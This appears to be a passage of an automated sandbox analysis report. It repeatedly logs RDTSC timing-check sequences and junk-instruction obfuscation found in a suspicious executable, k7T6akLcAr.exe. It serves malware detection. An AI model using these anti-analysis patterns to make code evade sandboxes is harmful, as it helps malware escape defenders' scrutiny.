              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10486EB second address: 1048703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F335931F14Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1048703 second address: 104871C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1049E73 second address: 1049E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F155h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1051817 second address: 105181C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1051EB6 second address: 1051ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F335931F151h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1051ECC second address: 1051EE8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F335854CBBCh 0x00000008 jns 00007F335854CBB6h 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 105208A second address: 1052094 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F335931F146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10521F0 second address: 10521F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1052CB8 second address: 1052CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10729A0 second address: 10729A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10729A4 second address: 10729C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F335931F15Dh 0x0000000c jmp 00007F335931F157h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 108797E second address: 1087982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1087AC7 second address: 1087ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1087ACC second address: 1087AD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1088197 second address: 10881A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jg 00007F335931F148h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10881A6 second address: 10881AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10881AC second address: 10881B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10884AE second address: 10884BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10884BA second address: 10884BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10884BE second address: 10884C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10884C2 second address: 10884C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10884C8 second address: 10884EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007F335854CBB6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F335854CBC4h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10884EE second address: 10884F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10884F2 second address: 1088504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBBCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1088504 second address: 108850E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F335931F146h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 108850E second address: 1088528 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1088528 second address: 1088538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F335931F146h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1088538 second address: 1088542 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F335854CBB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 108B4D3 second address: 108B500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F335931F14Eh 0x0000000c jmp 00007F335931F151h 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F335931F146h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 108B500 second address: 108B504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 108F92C second address: 108F9B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F157h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc edx, 16120EBAh 0x00000012 push dword ptr [ebp+122D2102h] 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F335931F148h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 call 00007F335931F150h 0x00000037 xor dword ptr [ebp+122D2D6Eh], edi 0x0000003d pop edx 0x0000003e call 00007F335931F149h 0x00000043 pushad 0x00000044 jmp 00007F335931F155h 0x00000049 push eax 0x0000004a push edx 0x0000004b je 00007F335931F146h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 108F9B4 second address: 108F9D5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F335854CBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F335854CBC2h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 108F9D5 second address: 108FA1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F150h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jnl 00007F335931F14Ah 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007F335931F151h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f je 00007F335931F154h 0x00000025 pushad 0x00000026 jc 00007F335931F146h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 1091325 second address: 109132E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 109132E second address: 1091334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 1090EBF second address: 1090EC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 1090EC5 second address: 1090EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F335931F14Ah 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 1090EDA second address: 1090EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 1090EE2 second address: 1090EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: FA7718 second address: FA771C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: FA771C second address: FA7722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: FA7722 second address: FA7733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335854CBBDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: FA7733 second address: FA7737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: FA7737 second address: FA7746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: FA7746 second address: FA774C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: FA7902 second address: FA7906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: FA7906 second address: FA792D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F158h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jnc 00007F335931F146h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BC0438 second address: 4BC043D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BC043D second address: 4BC0443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BC0443 second address: 4BC0498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a jmp 00007F335854CBC2h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushfd 0x00000017 jmp 00007F335854CBC3h 0x0000001c xor ah, FFFFFFDEh 0x0000001f jmp 00007F335854CBC9h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BC0498 second address: 4BC04EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov eax, 0A909033h 0x00000012 pushfd 0x00000013 jmp 00007F335931F158h 0x00000018 add eax, 65E3B838h 0x0000001e jmp 00007F335931F14Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ecx, dword ptr [ebp+08h] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BC04EB second address: 4BC04EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BC04EF second address: 4BC04F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BC04F3 second address: 4BC04F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF06C6 second address: 4BF0738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F335931F155h 0x00000009 and eax, 67D0B126h 0x0000000f jmp 00007F335931F151h 0x00000014 popfd 0x00000015 jmp 00007F335931F150h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e pushad 0x0000001f mov dh, 33h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushfd 0x00000024 jmp 00007F335931F158h 0x00000029 xor ah, 00000028h 0x0000002c jmp 00007F335931F14Bh 0x00000031 popfd 0x00000032 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF0738 second address: 4BF077D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F335854CBC8h 0x00000008 xor ecx, 1D986788h 0x0000000e jmp 00007F335854CBBBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F335854CBC0h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF077D second address: 4BF078C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF078C second address: 4BF0792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF0792 second address: 4BF0796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF0796 second address: 4BF07B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F335854CBBBh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF07B9 second address: 4BF07BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF07BE second address: 4BF07EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F335854CBC6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF07EF second address: 4BF07F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF07F3 second address: 4BF07F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF07F9 second address: 4BF07FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF07FF second address: 4BF0803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF0803 second address: 4BF0845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F335931F14Eh 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 mov si, E1B9h 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F335931F152h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF0845 second address: 4BF085A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF085A second address: 4BF0886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F335931F151h 0x0000000a and ch, FFFFFFE6h 0x0000000d jmp 00007F335931F151h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF0886 second address: 4BF088C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF088C second address: 4BF0890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF0890 second address: 4BF08AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F335854CBC2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF08AF second address: 4BF08B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF08B5 second address: 4BF08B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF08B9 second address: 4BF0962 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a call 00007F335931F154h 0x0000000f mov ecx, 682ADA71h 0x00000014 pop esi 0x00000015 pushfd 0x00000016 jmp 00007F335931F157h 0x0000001b sub eax, 441234DEh 0x00000021 jmp 00007F335931F159h 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esp], eax 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F335931F14Ch 0x00000032 or ax, 14D8h 0x00000037 jmp 00007F335931F14Bh 0x0000003c popfd 0x0000003d push eax 0x0000003e push edx 0x0000003f pushfd 0x00000040 jmp 00007F335931F156h 0x00000045 xor ax, DF38h 0x0000004a jmp 00007F335931F14Bh 0x0000004f popfd 0x00000050 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF0962 second address: 4BF0978 instructions: 0x00000000 rdtsc 0x00000002 mov cx, E16Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov eax, 1C718F67h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF09C8 second address: 4BF09F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F335931F14Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF09F6 second address: 4BF09FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF09FC second address: 4BF0A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF0A00 second address: 4BF0A04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BF0A32 second address: 4BE001A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F335931F156h 0x00000008 pushfd 0x00000009 jmp 00007F335931F152h 0x0000000e xor ecx, 0295C4A8h 0x00000014 jmp 00007F335931F14Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov eax, esi 0x0000001f jmp 00007F335931F156h 0x00000024 pop esi 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F335931F14Eh 0x0000002c or eax, 4903F238h 0x00000032 jmp 00007F335931F14Bh 0x00000037 popfd 0x00000038 mov si, 306Fh 0x0000003c popad 0x0000003d leave 0x0000003e jmp 00007F335931F152h 0x00000043 retn 0004h 0x00000046 nop 0x00000047 sub esp, 04h 0x0000004a xor ebx, ebx 0x0000004c cmp eax, 00000000h 0x0000004f je 00007F335931F2AAh 0x00000055 mov dword ptr [esp], 0000000Dh 0x0000005c call 00007F335D12B2E1h 0x00000061 mov edi, edi 0x00000063 jmp 00007F335931F14Ch 0x00000068 xchg eax, ebp 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c mov edi, 5B243430h 0x00000071 pushad 0x00000072 popad 0x00000073 popad 0x00000074 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE001A second address: 4BE003F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 mov ax, 1D1Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F335854CBC6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE003F second address: 4BE0062 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F335931F151h 0x00000008 mov eax, 54A2B697h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE0062 second address: 4BE0066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE0066 second address: 4BE006C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\k7T6akLcAr.exe RDTSC instruction interceptor: First address: 4BE006C second address: 4BE007D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335854CBBDh 0x00000009 rdtsc
